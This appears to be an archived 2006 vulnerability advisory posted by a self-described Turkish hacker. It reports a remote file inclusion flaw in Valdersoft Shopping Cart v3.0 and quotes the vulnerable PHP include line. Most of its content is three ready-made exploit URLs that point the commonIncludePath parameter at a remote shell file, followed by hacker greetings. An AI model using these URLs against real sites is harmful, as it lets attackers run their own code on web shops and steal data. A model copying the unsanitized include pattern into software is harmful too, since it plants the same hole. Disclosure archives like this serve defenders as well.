Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15448
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description


Valdersoft Shopping Cart v3.0 (E-Commerce Software)***[ commonIncludePath ] Remote File Include



+class : Remote File Include Vulnerability*


+Author : mdx *


+Files : * +/common_include/common.php , /include/common.php, /admin/include/common.php *


+code : * + * + include ( $commonIncludePath."common.php" ); * + *


  • Exploit : * +**************+
  • http://www.site./[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?+ +**************+
  • http://www.site./[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*+ +*************+
  • http://www.site./[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+ +*************+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ============================================================================================== ? * ? * ? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord ? * ?///////////////////////////////////////////////////////////////////////////////////////////// ?---------------------specials thanks stroke ,SHiKaA----------------------------------------

*** * ** KORKULARINIZ SADECE KABUSLARINIZDIR.. * ** * ****** Turkish Hacker by mdx * ** * ****** Korkmak Kurtulmak Degildir. * ** * **************